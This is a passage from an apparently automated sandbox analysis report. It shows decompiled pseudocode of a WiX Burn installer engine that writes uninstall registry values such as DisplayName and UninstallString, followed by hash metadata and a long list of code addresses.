                                                                          						_t56 = E000436F7(__ecx);
                                                                          						goto L10;
                                                                          					}
                                                                          					__eflags = _t54 - 0x67;
                                                                          					if(_t54 <= 0x67) {
                                                                          						L30:
                                                                          						_t56 = E00043280(_t102, _t130);
                                                                          						goto L10;
                                                                          					}
                                                                          					__eflags = _t54 - 0x69;
                                                                          					if(_t54 == 0x69) {
                                                                          						L27:
                                                                          						_t3 = _t130 + 0x20;
                                                                          						 *_t3 =  *(_t130 + 0x20) | 0x00000010;
                                                                          						__eflags =  *_t3;
                                                                          						goto L28;
                                                                          					}
                                                                          					__eflags = _t54 - 0x6e;
                                                                          					if(_t54 == 0x6e) {
                                                                          						_t56 = E00043664(__ecx, _t122);
                                                                          						goto L10;
                                                                          					}
                                                                          					__eflags = _t54 - 0x6f;
                                                                          					if(_t54 != 0x6f) {
                                                                          						goto L11;
                                                                          					}
                                                                          					_t56 = E000436D8(__ecx);
                                                                          					goto L10;
                                                                          				}
                                                                          				if(_t134 == 0) {
                                                                          					goto L27;
                                                                          				}
                                                                          				_t135 = _t54 - _t104;
                                                                          				if(_t135 > 0) {
                                                                          					_t98 = _t54 - 0x5a;
                                                                          					__eflags = _t98;
                                                                          					if(_t98 == 0) {
                                                                          						_t56 = E000430C3(__ecx);
                                                                          						goto L10;
                                                                          					}
                                                                          					_t99 = _t98 - 7;
                                                                          					__eflags = _t99;
                                                                          					if(_t99 == 0) {
                                                                          						goto L30;
                                                                          					}
                                                                          					__eflags = _t99;
                                                                          					if(__eflags != 0) {
                                                                          						goto L11;
                                                                          					}
                                                                          					L17:
                                                                          					_t56 = E00043482(_t130, __eflags, _t102);
                                                                          					goto L10;
                                                                          				}
                                                                          				if(_t135 == 0) {
                                                                          					_push(1);
                                                                          					goto L13;
                                                                          				}
                                                                          				if(_t54 == _t122) {
                                                                          					goto L30;
                                                                          				}
                                                                          				if(_t54 == 0x43) {
                                                                          					goto L17;
                                                                          				}
                                                                          				if(_t54 <= 0x44) {
                                                                          					goto L11;
                                                                          				}
                                                                          				if(_t54 <= 0x47) {
                                                                          					goto L30;
                                                                          				}
                                                                          				if(_t54 != 0x53) {
                                                                          					goto L11;
                                                                          				}
                                                                          				goto L9;
                                                                          			}


                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ff3959ed15a08cfa407d5d089e5b58bed8c4fb1a2e94a0216a38959a7c05694d
                                                                          • Instruction ID: 4e696a5d344e8a31f4a3c597cfd317005685ea1c0f53bbbdca52c53e3b005ecf
                                                                          • Opcode Fuzzy Hash: ff3959ed15a08cfa407d5d089e5b58bed8c4fb1a2e94a0216a38959a7c05694d
                                                                          • Instruction Fuzzy Hash: FA615BF1B0070966DAB899298895BFE73D4EF51300FD40939F983DB282DA51ED86C35D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 81%
                                                                          			E0001FE26(void* __ebx, char* __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int _a28, unsigned int _a32) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				unsigned int _v20;
                                                                          				void* __edi;
                                                                          				unsigned int _t136;
                                                                          				char* _t137;
                                                                          				char* _t138;
                                                                          				signed int _t147;
                                                                          				char* _t155;
                                                                          				signed int _t156;
                                                                          				char* _t159;
                                                                          				signed int _t160;
                                                                          				char* _t162;
                                                                          				char* _t163;
                                                                          				intOrPtr _t164;
                                                                          				void* _t193;
                                                                          				char* _t195;
                                                                          				signed int _t201;
                                                                          				unsigned int _t206;
                                                                          				intOrPtr* _t207;
                                                                          				char* _t208;
                                                                          				void* _t209;
                                                                          				void* _t210;
                                                                          
                                                                          				_t205 = __edx;
                                                                          				_t197 = __ecx;
                                                                          				_t193 = __ebx;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v16 = _v16 & 0x00000000;
                                                                          				_t207 = _a8;
                                                                          				_push(E00023C30( *((intOrPtr*)(_t207 + 8))));
                                                                          				_push(_a20);
                                                                          				E0001550F(3, 0x20000172,  *((intOrPtr*)(_t207 + 0x50)));
                                                                          				_t210 = _t209 + 0x14;
                                                                          				if((_a20 & 0x00000001) == 0) {
                                                                          					L3:
                                                                          					_t208 = E00050A88( *((intOrPtr*)(_t207 + 0x4c)),  *((intOrPtr*)(_t207 + 0x50)), 0x20006,  &_v8);
                                                                          					__eflags = _t208;
                                                                          					if(_t208 >= 0) {
                                                                          						__eflags = _a20 & 0x00000002;
                                                                          						_push(_t193);
                                                                          						if((_a20 & 0x00000002) == 0) {
                                                                          							L76:
                                                                          							__eflags = _a20 & 0x00000004;
                                                                          							if((_a20 & 0x00000004) == 0) {
                                                                          								L87:
                                                                          								__eflags = _a24 - 1;
                                                                          								if(__eflags != 0) {
                                                                          									L90:
                                                                          									_t208 = E0001F09D(_t205, __eflags, _t207, _v8, 1, 0);
                                                                          									__eflags = _t208;
                                                                          									if(_t208 < 0) {
                                                                          										_push("Failed to update resume mode.");
                                                                          										goto L92;
                                                                          									}
                                                                          								} else {
                                                                          									_t208 = E00038356(_t197, _t205, _t207);
                                                                          									__eflags = _t208;
                                                                          									if(__eflags >= 0) {
                                                                          										goto L90;
                                                                          									} else {
                                                                          										_push("Failed to register the bundle dependency key.");
                                                                          										goto L92;
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								_t136 = _a32;
                                                                          								_t197 = (_t136 << 0x00000020 | _a28) >> 0xa;
                                                                          								_t137 = _t136 >> 0xa;
                                                                          								__eflags = _t137;
                                                                          								if(__eflags < 0) {
                                                                          									goto L87;
                                                                          								} else {
                                                                          									if(__eflags > 0) {
                                                                          										L81:
                                                                          										_t138 = 0xffffffff;
                                                                          										if(__eflags <= 0) {
                                                                          											__eflags = _t197 - _t138;
                                                                          											if(_t197 <= _t138) {
                                                                          												goto L83;
                                                                          											}
                                                                          										}
                                                                          										goto L84;
                                                                          									} else {
                                                                          										__eflags = _t197;
                                                                          										if(_t197 == 0) {
                                                                          											goto L87;
                                                                          										} else {
                                                                          											__eflags = _t137;
                                                                          											if(__eflags < 0) {
                                                                          												L83:
                                                                          												_t138 = _t197;
                                                                          											} else {
                                                                          												goto L81;
                                                                          											}
                                                                          											L84:
                                                                          											_t195 = L"EstimatedSize";
                                                                          											_t208 = E00051344(_v8, _t195, _t138);
                                                                          											__eflags = _t208;
                                                                          											if(_t208 >= 0) {
                                                                          												goto L87;
                                                                          											} else {
                                                                          												goto L85;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t195 = L"BundleCachePath";
                                                                          							_t208 = E00051392(_t197, _t205, _v8, _t195,  *((intOrPtr*)(_t207 + 0x54)));
                                                                          							__eflags = _t208;
                                                                          							if(_t208 < 0) {
                                                                          								L85:
                                                                          								_push(_t195);
                                                                          								goto L86;
                                                                          							} else {
                                                                          								_t195 = L"BundleUpgradeCode";
                                                                          								_t208 = E0005143C(_v8, _t195,  *((intOrPtr*)(_t207 + 0x20)),  *((intOrPtr*)(_t207 + 0x24)));
                                                                          								__eflags = _t208;
                                                                          								if(_t208 < 0) {
                                                                          									goto L85;
                                                                          								} else {
                                                                          									_t195 = L"BundleAddonCode";
                                                                          									_t208 = E0005143C(_v8, _t195,  *((intOrPtr*)(_t207 + 0x28)),  *((intOrPtr*)(_t207 + 0x2c)));
                                                                          									__eflags = _t208;
                                                                          									if(_t208 < 0) {
                                                                          										goto L85;
                                                                          									} else {
                                                                          										_t195 = L"BundleDetectCode";
                                                                          										_t208 = E0005143C(_v8, _t195,  *((intOrPtr*)(_t207 + 0x18)),  *((intOrPtr*)(_t207 + 0x1c)));
                                                                          										__eflags = _t208;
                                                                          										if(_t208 < 0) {
                                                                          											goto L85;
                                                                          										} else {
                                                                          											_t195 = L"BundlePatchCode";
                                                                          											_t208 = E0005143C(_v8, _t195,  *((intOrPtr*)(_t207 + 0x30)),  *((intOrPtr*)(_t207 + 0x34)));
                                                                          											__eflags = _t208;
                                                                          											if(_t208 < 0) {
                                                                          												goto L85;
                                                                          											} else {
                                                                          												_t201 =  *(_t207 + 0x38);
                                                                          												_t195 = L"BundleVersion";
                                                                          												_t206 =  *(_t207 + 0x3c);
                                                                          												_push(_t201 & 0x0000ffff);
                                                                          												_t147 = _t206;
                                                                          												_v20 = _t206;
                                                                          												_t202 = (_t147 << 0x00000020 | _t201) >> 0x10;
                                                                          												_push((_t147 << 0x00000020 | _t201) >> 0x10 & 0x0000ffff);
                                                                          												_push(_t206 & 0x0000ffff);
                                                                          												_t205 = _t206 >> 0x10;
                                                                          												_t208 = E00051587((_t147 << 0x00000020 | _t201) >> 0x10, _t206 >> 0x10, _v8, _t195, L"%hu.%hu.%hu.%hu", _t206 >> 0x10);
                                                                          												_t210 = _t210 + 0x1c;
                                                                          												__eflags = _t208;
                                                                          												if(_t208 < 0) {
                                                                          													goto L85;
                                                                          												} else {
                                                                          													__eflags =  *(_t207 + 0x44);
                                                                          													if( *(_t207 + 0x44) == 0) {
                                                                          														L14:
                                                                          														__eflags =  *(_t207 + 0x14);
                                                                          														if( *(_t207 + 0x14) == 0) {
                                                                          															L16:
                                                                          															_t195 = L"EngineVersion";
                                                                          															_t208 = E00051587(_t202, _t205, _v8, _t195, L"%hs", "3.10.4.4718");
                                                                          															_t210 = _t210 + 0x10;
                                                                          															__eflags = _t208;
                                                                          															if(_t208 < 0) {
                                                                          																goto L85;
                                                                          															} else {
                                                                          																_t195 = L"DisplayIcon";
                                                                          																_t208 = E00051587(_t202, _t205, _v8, _t195, L"%s,0",  *((intOrPtr*)(_t207 + 0x54)));
                                                                          																_t210 = _t210 + 0x10;
                                                                          																__eflags = _t208;
                                                                          																if(_t208 < 0) {
                                                                          																	goto L85;
                                                                          																} else {
                                                                          																	_t196 = _a12;
                                                                          																	_t155 = E0001E8CE(_t202, _t207, _a12,  &_v12);
                                                                          																	__eflags = _t155;
                                                                          																	_t156 = _v12;
                                                                          																	if(_t155 < 0) {
                                                                          																		_t156 =  *((intOrPtr*)(_t207 + 0x60));
                                                                          																	}
                                                                          																	_t208 = E00051392(_t202, _t205, _v8, L"DisplayName", _t156);
                                                                          																	__eflags = _t208;
                                                                          																	if(_t208 >= 0) {
                                                                          																		__eflags =  *(_t207 + 0x64);
                                                                          																		if( *(_t207 + 0x64) == 0) {
                                                                          																			L25:
                                                                          																			_t159 = E0001E866(_t202, _t207, _t196,  &_v16);
                                                                          																			__eflags = _t159;
                                                                          																			_t160 = _v16;
                                                                          																			if(_t159 < 0) {
                                                                          																				_t160 =  *((intOrPtr*)(_t207 + 0x68));
                                                                          																			}
                                                                          																			_t208 = E00051392(_t202, _t205, _v8, L"Publisher", _t160);
                                                                          																			__eflags = _t208;
                                                                          																			if(_t208 >= 0) {
                                                                          																				__eflags =  *(_t207 + 0x6c);
                                                                          																				if( *(_t207 + 0x6c) == 0) {
                                                                          																					L32:
                                                                          																					__eflags =  *(_t207 + 0x70);
                                                                          																					if( *(_t207 + 0x70) == 0) {
                                                                          																						L35:
                                                                          																						__eflags =  *(_t207 + 0x74);
                                                                          																						if( *(_t207 + 0x74) == 0) {
                                                                          																							L38:
                                                                          																							__eflags =  *(_t207 + 0x78);
                                                                          																							if( *(_t207 + 0x78) == 0) {
                                                                          																								L41:
                                                                          																								__eflags =  *(_t207 + 0x7c);
                                                                          																								if( *(_t207 + 0x7c) == 0) {
                                                                          																									L46:
                                                                          																									_t162 =  *(_t207 + 0x80);
                                                                          																									__eflags = _t162;
                                                                          																									if(_t162 == 0) {
                                                                          																										L49:
                                                                          																										_t163 =  *(_t207 + 0x84);
                                                                          																										__eflags = _t163;
                                                                          																										if(_t163 == 0) {
                                                                          																											L52:
                                                                          																											_t164 =  *((intOrPtr*)(_t207 + 0x88));
                                                                          																											__eflags = _t164 - 1;
                                                                          																											if(_t164 != 1) {
                                                                          																												__eflags = _t164 - 2;
                                                                          																												if(_t164 == 2) {
                                                                          																													goto L60;
                                                                          																												} else {
                                                                          																													_t208 = E00051587(_t202, _t205, _v8, L"ModifyPath", L"\"%ls\" /modify",  *((intOrPtr*)(_t207 + 0x54)));
                                                                          																													_t210 = _t210 + 0x10;
                                                                          																													__eflags = _t208;
                                                                          																													if(_t208 >= 0) {
                                                                          																														_t208 = E00051344(_v8, L"NoElevateOnModify", 1);
                                                                          																														__eflags = _t208;
                                                                          																														if(_t208 >= 0) {
                                                                          																															goto L60;
                                                                          																														} else {
                                                                          																															_push(L"NoElevateOnModify");
                                                                          																															goto L86;
                                                                          																														}
                                                                          																													} else {
                                                                          																														_push(L"ModifyPath");
                                                                          																														goto L86;
                                                                          																													}
                                                                          																												}
                                                                          																											} else {
                                                                          																												_t208 = E00051344(_v8, L"NoModify", _t164);
                                                                          																												__eflags = _t208;
                                                                          																												if(_t208 >= 0) {
                                                                          																													L60:
                                                                          																													__eflags =  *(_t207 + 0x8c);
                                                                          																													if( *(_t207 + 0x8c) == 0) {
                                                                          																														L63:
                                                                          																														__eflags =  *(_t207 + 4);
                                                                          																														if( *(_t207 + 4) != 0) {
                                                                          																															L66:
                                                                          																															_t208 = E00051587(_t202, _t205, _v8, L"QuietUninstallString", L"\"%ls\" /uninstall /quiet",  *((intOrPtr*)(_t207 + 0x54)));
                                                                          																															_t210 = _t210 + 0x10;
                                                                          																															__eflags = _t208;
                                                                          																															if(_t208 >= 0) {
                                                                          																																__eflags =  *((intOrPtr*)(_t207 + 0x88)) - 2;
                                                                          																																_t197 = L" /uninstall";
                                                                          																																_t167 =  !=  ? L" /uninstall" : L"/modify";
                                                                          																																_push( !=  ? L" /uninstall" : L"/modify");
                                                                          																																_t208 = E00051587(L" /uninstall", _t205, _v8, L"UninstallString", L"\"%ls\" %ls",  *((intOrPtr*)(_t207 + 0x54)));
                                                                          																																_t210 = _t210 + 0x14;
                                                                          																																__eflags = _t208;
                                                                          																																if(_t208 >= 0) {
                                                                          																																	__eflags =  *(_t207 + 0x98);
                                                                          																																	if( *(_t207 + 0x98) == 0) {
                                                                          																																		L73:
                                                                          																																		__eflags =  *(_t207 + 0x9c);
                                                                          																																		if( *(_t207 + 0x9c) == 0) {
                                                                          																																			goto L76;
                                                                          																																		} else {
                                                                          																																			_t208 = E0001F410(_t197, _t205, _t207, _t196);
                                                                          																																			__eflags = _t208;
                                                                          																																			if(_t208 >= 0) {
                                                                          																																				goto L76;
                                                                          																																			} else {
                                                                          																																				_push("Failed to write update registration.");
                                                                          																																				goto L92;
                                                                          																																			}
                                                                          																																		}
                                                                          																																	} else {
                                                                          																																		_t105 = _t207 + 0x94; // 0x94
                                                                          																																		_t208 = E0001F2DC(_t196, _t196, _t105);
                                                                          																																		__eflags = _t208;
                                                                          																																		if(_t208 >= 0) {
                                                                          																																			goto L73;
                                                                          																																		} else {
                                                                          																																			_push("Failed to write software tags.");
                                                                          																																			L92:
                                                                          																																			_push(_t208);
                                                                          																																			E0005012F();
                                                                          																																		}
                                                                          																																	}
                                                                          																																} else {
                                                                          																																	_push(L"UninstallString");
                                                                          																																	goto L86;
                                                                          																																}
                                                                          																															} else {
                                                                          																																_push(L"QuietUninstallString");
                                                                          																																goto L86;
                                                                          																															}
                                                                          																														} else {
                                                                          																															_t208 = E00051344(_v8, L"SystemComponent", 1);
                                                                          																															__eflags = _t208;
                                                                          																															if(_t208 >= 0) {
                                                                          																																goto L66;
                                                                          																															} else {
                                                                          																																_push(L"SystemComponent");
                                                                          																																goto L86;
                                                                          																															}
                                                                          																														}
                                                                          																													} else {
                                                                          																														_t208 = E00051344(_v8, L"NoRemove",  *((intOrPtr*)(_t207 + 0x90)));
                                                                          																														__eflags = _t208;
                                                                          																														if(_t208 >= 0) {
                                                                          																															goto L63;
                                                                          																														} else {
                                                                          																															_push(L"NoRemove");
                                                                          																															goto L86;
                                                                          																														}
                                                                          																													}
                                                                          																												} else {
                                                                          																													_push(L"NoModify");
                                                                          																													goto L86;
                                                                          																												}
                                                                          																											}
                                                                          																										} else {
                                                                          																											_t208 = E00051392(_t202, _t205, _v8, L"Contact", _t163);
                                                                          																											__eflags = _t208;
                                                                          																											if(_t208 >= 0) {
                                                                          																												goto L52;
                                                                          																											} else {
                                                                          																												_push(L"Contact");
                                                                          																												goto L86;
                                                                          																											}
                                                                          																										}
                                                                          																									} else {
                                                                          																										_t208 = E00051392(_t202, _t205, _v8, L"Comments", _t162);
                                                                          																										__eflags = _t208;
                                                                          																										if(_t208 >= 0) {
                                                                          																											goto L49;
                                                                          																										} else {
                                                                          																											_push(L"Comments");
                                                                          																											goto L86;
                                                                          																										}
                                                                          																									}
                                                                          																								} else {
                                                                          																									_t208 = E00051392(_t202, _t205, _v8, L"ParentDisplayName",  *(_t207 + 0x7c));
                                                                          																									__eflags = _t208;
                                                                          																									if(_t208 >= 0) {
                                                                          																										_t208 = E00051392(_t202, _t205, _v8, L"ParentKeyName",  *(_t207 + 0x7c));
                                                                          																										__eflags = _t208;
                                                                          																										if(_t208 >= 0) {
                                                                          																											goto L46;
                                                                          																										} else {
                                                                          																											_push(L"ParentKeyName");
                                                                          																											goto L86;
                                                                          																										}
                                                                          																									} else {
                                                                          																										_push(L"ParentDisplayName");
                                                                          																										goto L86;
                                                                          																									}
                                                                          																								}
                                                                          																							} else {
                                                                          																								_t208 = E00051392(_t202, _t205, _v8, L"URLUpdateInfo",  *(_t207 + 0x78));
                                                                          																								__eflags = _t208;
                                                                          																								if(_t208 >= 0) {
                                                                          																									goto L41;
                                                                          																								} else {
                                                                          																									_push(L"URLUpdateInfo");
                                                                          																									goto L86;
                                                                          																								}
                                                                          																							}
                                                                          																						} else {
                                                                          																							_t208 = E00051392(_t202, _t205, _v8, L"URLInfoAbout",  *(_t207 + 0x74));
                                                                          																							__eflags = _t208;
                                                                          																							if(_t208 >= 0) {
                                                                          																								goto L38;
                                                                          																							} else {
                                                                          																								_push(L"URLInfoAbout");
                                                                          																								goto L86;
                                                                          																							}
                                                                          																						}
                                                                          																					} else {
                                                                          																						_t208 = E00051392(_t202, _t205, _v8, L"HelpTelephone",  *(_t207 + 0x70));
                                                                          																						__eflags = _t208;
                                                                          																						if(_t208 >= 0) {
                                                                          																							goto L35;
                                                                          																						} else {
                                                                          																							_push(L"HelpTelephone");
                                                                          																							goto L86;
                                                                          																						}
                                                                          																					}
                                                                          																				} else {
                                                                          																					_t208 = E00051392(_t202, _t205, _v8, L"HelpLink",  *(_t207 + 0x6c));
                                                                          																					__eflags = _t208;
                                                                          																					if(_t208 >= 0) {
                                                                          																						goto L32;
                                                                          																					} else {
                                                                          																						_push(L"HelpLink");
                                                                          																						goto L86;
                                                                          																					}
                                                                          																				}
                                                                          																			} else {
                                                                          																				_push(L"Publisher");
                                                                          																				goto L86;
                                                                          																			}
                                                                          																		} else {
                                                                          																			_t208 = E00051392(_t202, _t205, _v8, L"DisplayVersion",  *(_t207 + 0x64));
                                                                          																			__eflags = _t208;
                                                                          																			if(_t208 >= 0) {
                                                                          																				goto L25;
                                                                          																			} else {
                                                                          																				_push(L"DisplayVersion");
                                                                          																				goto L86;
                                                                          																			}
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push(L"DisplayName");
                                                                          																		L86:
                                                                          																		_push("Failed to write %ls value.");
                                                                          																		_push(_t208);
                                                                          																		E0005012F();
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														} else {
                                                                          															_t195 = L"BundleTag";
                                                                          															_t208 = E00051392(_t202, _t205, _v8, _t195,  *(_t207 + 0x14));
                                                                          															__eflags = _t208;
                                                                          															if(_t208 < 0) {
                                                                          																goto L85;
                                                                          															} else {
                                                                          																goto L16;
                                                                          															}
                                                                          														}
                                                                          													} else {
                                                                          														_t195 = L"BundleProviderKey";
                                                                          														_t208 = E00051392(_t202, _t205, _v8, _t195,  *(_t207 + 0x44));
                                                                          														__eflags = _t208;
                                                                          														if(_t208 < 0) {
                                                                          															goto L85;
                                                                          														} else {
                                                                          															goto L14;
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to create registration key.");
                                                                          						_push(_t208);
                                                                          						E0005012F();
                                                                          					}
                                                                          				} else {
                                                                          					_t208 = E00029AD2(_t197, __edx, _t207,  *_t207,  *((intOrPtr*)(_t207 + 0x48)),  *((intOrPtr*)(_t207 + 0x10)), _a16 + 4, _a4);
                                                                          					if(_t208 >= 0) {
                                                                          						goto L3;
                                                                          					} else {
                                                                          						E0005012F(_t208, "Failed to cache bundle from path: %ls", _a4);
                                                                          					}
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					E000554EF(_v16);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          				}
                                                                          				return _t208;
                                                                          			}



























                                                                          0x0001ff5e
                                                                          0x0001ff5e
                                                                          0x0001ff61
                                                                          0x0001ff66
                                                                          0x0001ff6c
                                                                          0x0001ff6d
                                                                          0x0001ff6f
                                                                          0x0001ff72
                                                                          0x0001ff7c
                                                                          0x0001ff80
                                                                          0x0001ff81
                                                                          0x0001ff93
                                                                          0x0001ff95
                                                                          0x0001ff98
                                                                          0x0001ff9a
                                                                          0x00000000
                                                                          0x0001ffa0
                                                                          0x0001ffa0
                                                                          0x0001ffa4
                                                                          0x0001ffc1
                                                                          0x0001ffc1
                                                                          0x0001ffc5
                                                                          0x0001ffe2
                                                                          0x0001ffec
                                                                          0x0001fffa
                                                                          0x0001fffc
                                                                          0x0001ffff
                                                                          0x00020001
                                                                          0x00000000
                                                                          0x00020007
                                                                          0x0002000a
                                                                          0x0002001d
                                                                          0x0002001f
                                                                          0x00020022
                                                                          0x00020024
                                                                          0x00000000
                                                                          0x0002002a
                                                                          0x0002002a
                                                                          0x00020033
                                                                          0x00020038
                                                                          0x0002003a
                                                                          0x0002003d
                                                                          0x0002003f
                                                                          0x0002003f
                                                                          0x00020050
                                                                          0x00020052
                                                                          0x00020054
                                                                          0x00020060
                                                                          0x00020064
                                                                          0x00020086
                                                                          0x0002008c
                                                                          0x00020091
                                                                          0x00020093
                                                                          0x00020096
                                                                          0x00020098
                                                                          0x00020098
                                                                          0x000200a9
                                                                          0x000200ab
                                                                          0x000200ad
                                                                          0x000200b9
                                                                          0x000200bd
                                                                          0x000200df
                                                                          0x000200df
                                                                          0x000200e3
                                                                          0x00020105
                                                                          0x00020105
                                                                          0x00020109
                                                                          0x0002012b
                                                                          0x0002012b
                                                                          0x0002012f
                                                                          0x00020151
                                                                          0x00020151
                                                                          0x00020155
                                                                          0x00020197
                                                                          0x00020197
                                                                          0x0002019d
                                                                          0x0002019f
                                                                          0x000201bf
                                                                          0x000201bf
                                                                          0x000201c5
                                                                          0x000201c7
                                                                          0x000201e7
                                                                          0x000201e7
                                                                          0x000201ed
                                                                          0x000201f0
                                                                          0x00020210
                                                                          0x00020213
                                                                          0x00000000
                                                                          0x00020215
                                                                          0x0002022a
                                                                          0x0002022c
                                                                          0x0002022f
                                                                          0x00020231
                                                                          0x0002024c
                                                                          0x0002024e
                                                                          0x00020250
                                                                          0x00000000
                                                                          0x00020252
                                                                          0x00020252
                                                                          0x00000000
                                                                          0x00020252
                                                                          0x00020233
                                                                          0x00020233
                                                                          0x00000000
                                                                          0x00020233
                                                                          0x00020231
                                                                          0x000201f2
                                                                          0x00020200
                                                                          0x00020202
                                                                          0x00020204
                                                                          0x0002025c
                                                                          0x0002025c
                                                                          0x00020263
                                                                          0x00020288
                                                                          0x00020288
                                                                          0x0002028c
                                                                          0x000202ad
                                                                          0x000202c2
                                                                          0x000202c4
                                                                          0x000202c7
                                                                          0x000202c9
                                                                          0x000202d5
                                                                          0x000202dc
                                                                          0x000202e6
                                                                          0x000202e9
                                                                          0x000202ff
                                                                          0x00020301
                                                                          0x00020304
                                                                          0x00020306
                                                                          0x00020312
                                                                          0x00020319
                                                                          0x00020338
                                                                          0x00020338
                                                                          0x0002033f
                                                                          0x00000000
                                                                          0x00020341
                                                                          0x00020348
                                                                          0x0002034a
                                                                          0x0002034c
                                                                          0x00000000
                                                                          0x0002034e
                                                                          0x0002034e
                                                                          0x00000000
                                                                          0x0002034e
                                                                          0x0002034c
                                                                          0x0002031b
                                                                          0x0002031b
                                                                          0x00020328
                                                                          0x0002032a
                                                                          0x0002032c
                                                                          0x00000000
                                                                          0x0002032e
                                                                          0x0002032e
                                                                          0x000203db
                                                                          0x000203db
                                                                          0x000203dc
                                                                          0x000203e2
                                                                          0x0002032c
                                                                          0x00020308
                                                                          0x00020308
                                                                          0x00000000
                                                                          0x00020308
                                                                          0x000202cb
                                                                          0x000202cb
                                                                          0x00000000
                                                                          0x000202cb
                                                                          0x0002028e
                                                                          0x0002029d
                                                                          0x0002029f
                                                                          0x000202a1
                                                                          0x00000000
                                                                          0x000202a3
                                                                          0x000202a3
                                                                          0x00000000
                                                                          0x000202a3
                                                                          0x000202a1
                                                                          0x00020265
                                                                          0x00020278
                                                                          0x0002027a
                                                                          0x0002027c
                                                                          0x00000000
                                                                          0x0002027e
                                                                          0x0002027e
                                                                          0x00000000
                                                                          0x0002027e
                                                                          0x0002027c
                                                                          0x00020206
                                                                          0x00020206
                                                                          0x00000000
                                                                          0x00020206
                                                                          0x00020204
                                                                          0x000201c9
                                                                          0x000201d7
                                                                          0x000201d9
                                                                          0x000201db
                                                                          0x00000000
                                                                          0x000201dd
                                                                          0x000201dd
                                                                          0x00000000
                                                                          0x000201dd
                                                                          0x000201db
                                                                          0x000201a1
                                                                          0x000201af
                                                                          0x000201b1
                                                                          0x000201b3
                                                                          0x00000000
                                                                          0x000201b5
                                                                          0x000201b5
                                                                          0x00000000
                                                                          0x000201b5
                                                                          0x000201b3
                                                                          0x00020157
                                                                          0x00020167
                                                                          0x00020169
                                                                          0x0002016b
                                                                          0x00020187
                                                                          0x00020189
                                                                          0x0002018b
                                                                          0x00000000
                                                                          0x0002018d
                                                                          0x0002018d
                                                                          0x00000000
                                                                          0x0002018d
                                                                          0x0002016d
                                                                          0x0002016d
                                                                          0x00000000
                                                                          0x0002016d
                                                                          0x0002016b
                                                                          0x00020131
                                                                          0x00020141
                                                                          0x00020143
                                                                          0x00020145
                                                                          0x00000000
                                                                          0x00020147
                                                                          0x00020147
                                                                          0x00000000
                                                                          0x00020147
                                                                          0x00020145
                                                                          0x0002010b
                                                                          0x0002011b
                                                                          0x0002011d
                                                                          0x0002011f
                                                                          0x00000000
                                                                          0x00020121
                                                                          0x00020121
                                                                          0x00000000
                                                                          0x00020121
                                                                          0x0002011f
                                                                          0x000200e5
                                                                          0x000200f5
                                                                          0x000200f7
                                                                          0x000200f9
                                                                          0x00000000
                                                                          0x000200fb
                                                                          0x000200fb
                                                                          0x00000000
                                                                          0x000200fb
                                                                          0x000200f9
                                                                          0x000200bf
                                                                          0x000200cf
                                                                          0x000200d1
                                                                          0x000200d3
                                                                          0x00000000
                                                                          0x000200d5
                                                                          0x000200d5
                                                                          0x00000000
                                                                          0x000200d5
                                                                          0x000200d3
                                                                          0x000200af
                                                                          0x000200af
                                                                          0x00000000
                                                                          0x000200af
                                                                          0x00020066
                                                                          0x00020076
                                                                          0x00020078
                                                                          0x0002007a
                                                                          0x00000000
                                                                          0x0002007c
                                                                          0x0002007c
                                                                          0x00000000
                                                                          0x0002007c
                                                                          0x0002007a
                                                                          0x00020056
                                                                          0x00020056
                                                                          0x0002039a
                                                                          0x0002039a
                                                                          0x0002039f
                                                                          0x000203a0
                                                                          0x000203a5
                                                                          0x00020054
                                                                          0x00020024
                                                                          0x0001ffc7
                                                                          0x0001ffca
                                                                          0x0001ffd8
                                                                          0x0001ffda
                                                                          0x0001ffdc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ffdc
                                                                          0x0001ffa6
                                                                          0x0001ffa9
                                                                          0x0001ffb7
                                                                          0x0001ffb9
                                                                          0x0001ffbb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ffbb
                                                                          0x0001ffa4
                                                                          0x0001ff9a
                                                                          0x0001ff58
                                                                          0x0001ff3a
                                                                          0x0001ff1c
                                                                          0x0001fefe
                                                                          0x0001fee0
                                                                          0x0001feae
                                                                          0x0001feae
                                                                          0x0001feb3
                                                                          0x0001feb4
                                                                          0x0001feba
                                                                          0x0001fe61
                                                                          0x0001fe78
                                                                          0x0001fe7c
                                                                          0x00000000
                                                                          0x0001fe7e
                                                                          0x0001fe87
                                                                          0x0001fe8c
                                                                          0x0001fe7c
                                                                          0x000203e8
                                                                          0x000203ed
                                                                          0x000203ed
                                                                          0x000203f6
                                                                          0x000203fb
                                                                          0x000203fb
                                                                          0x00020404
                                                                          0x00020409
